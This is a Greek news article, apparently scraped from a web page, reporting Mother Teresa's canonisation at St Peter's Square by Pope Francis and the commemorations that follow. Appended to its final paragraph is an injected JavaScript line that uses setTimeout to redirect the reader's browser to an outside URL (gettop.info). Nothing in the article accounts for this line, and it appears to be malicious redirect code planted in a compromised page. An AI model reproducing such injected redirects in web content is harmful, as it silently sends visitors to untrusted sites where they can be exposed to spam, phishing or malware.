Αγιοποιήθηκε η μητέρα Τερέζα (ΕΙΚΟΝΕΣ – ΒΙΝΤΕΟ)

0
14

 

Οι προσπάθειες που κατέβαλε προκειμένου να βοηθήσει τους φτωχούς και ανήμπορους ανθρώπους στην Ινδία έκαναν την καθολική μοναχή Μητέρα Τερέζα γνωστή σε όλα τα μήκη και πλάτη του πλανήτη.

Σήμερα 19 χρόνια μετά τον θάνατό της ανακηρύχθηκε Αγία στο Βατικανό, με εκατοντάδες πιστούς να έχουν συγκεντρωθεί στην πλατεία του Αγίου Πέτρου για να δουν τον Πάπα Φραγκίσκο να διεξάγει την τελετή, παρουσία 13 αρχηγών ξένων κρατών και κυβερνήσεων.

«Η μητέρα Τερέζα βοήθησε τους ανθρώπους που είχαν εξαντλήσει τις δυνάμεις τους, όσους είχαν εγκαταλειφθεί, αδιάφορα, και θα πέθαιναν στην άκρη του δρόμου», πρόσθεσε ο Αργεντινός ποντίφικας.

Εικονίσματα εκτίθενται μέσα και έξω από το Βατικανό, ενώ έχουν προγραμματιστεί μουσικές εκδηλώσεις, σεμινάρια και συγκεντρώσεις για προσευχή εις μνήμην της. Στην Καλκούτα, εκδηλώσεις θα διεξάγονται για τους υπόλοιπους τρεις μήνες.

Κατά την αυριανή ημέρα, 5 Σεπτεμβρίου, η Καθολική Εκκλησία θα γιορτάζει, κάθε χρόνο, την αγία Τερέζα της Καλκούτας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here